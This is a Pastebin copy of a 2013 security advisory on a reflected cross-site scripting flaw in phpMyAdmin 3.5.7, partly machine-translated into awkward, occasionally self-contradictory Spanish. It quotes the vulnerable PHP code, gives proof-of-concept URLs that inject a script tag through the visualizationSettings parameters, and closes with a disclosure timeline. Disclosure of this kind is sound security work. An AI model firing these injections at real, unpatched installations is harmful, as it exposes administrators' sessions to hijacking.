Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title: phpMyAdmin 3.5.7 Cross Site Scripting Vulnerability
- Date add: 2013-04-11
- Category: web applications
- Verified: Verified
- Platform: php
- Description:
- phpMyAdmin version 3.5.7 suffers from a reflective cross site scripting vulnerability.
- ---------------------------------------------------------------------------------------
- Reflected XSS in phpMyAdmin 3.5.7
- ====================================================
- Author: Janek Vind "waraxe"
- Date: 09. April 2013
- Location: Estonia, Tartu
- Web: http://www.waraxe.us/advisory-102.html
- Description of vulnerable software:
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- phpMyAdmin es una herramienta de software libre escrito en PHP, pensado para gestionar la
- administración de MySQL a través de la World Wide Web. phpMyAdmin es compatible con una amplia
- gama de operaciones con MySQL.
- http://www.phpmyadmin.net/home_page/index.php
- Afectados son versiones 3.5.0 a 3.5.7, no las versiones vulnerables.
- ###############################################################################
- 1. Reflected XSS in "tbl_gis_visualization.php"
- ###############################################################################
- Razón:
- 1. desinfección insuficiente de salida html
- Vectores de ataque:
- 1. suministrados por el usuario los parámetros "visualizationSettings[width]" y "visualizationSettings[height]"
- Requisitos:
- 1. sesión válida
- 2. "token" parámetro debe ser conocido
- 3. Nombre de base de datos válido debe ser conocido
- Php script "tbl_gis_visualization.php" line 51:
- ------------------------[ source code start ]----------------------------------
- // Get settings if any posted
- $visualizationSettings = array();
- if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) {
- $visualizationSettings = $_REQUEST['visualizationSettings'];
- ..
- <legend><?php echo __('Display GIS Visualization'); ?></legend>
- <div id="placeholder" style="width:<?php echo($visualizationSettings['width']); ?>px;
- height:<?php echo($visualizationSettings['height']); ?>px;">
- ------------------------[ source code end ]------------------------------------
- Tests (parameters "db" and "token" must be valid):
- http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&
- token=17961b7ab247b6d2b39d730bf336cebb&
- visualizationSettings[width]="><script>alert(123);</script>
- http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&
- token=17961b7ab247b6d2b39d730bf336cebb
- &visualizationSettings[height]="><script>alert(123);</script>
- Result: javascript alert box pops up, confirming Reflected XSS vulnerability.
- Disclosure timeline:
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- 31.03.2013 - email> enviados a los desarrolladores
- 31.03.2013 - email> La primera respuesta de los desarrolladores
- 04/02/2013 -> segundo correo de los desarrolladores - XSS parcheado en el repositorio Git
- 03/04/2013 -> phpMyAdmin 3.5.8-rc1 se libera
- 08.04.2013 - phpMyAdmin> 3.5.8 es liberado
- 04/09/2013 -> Consultivo Público liberado
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement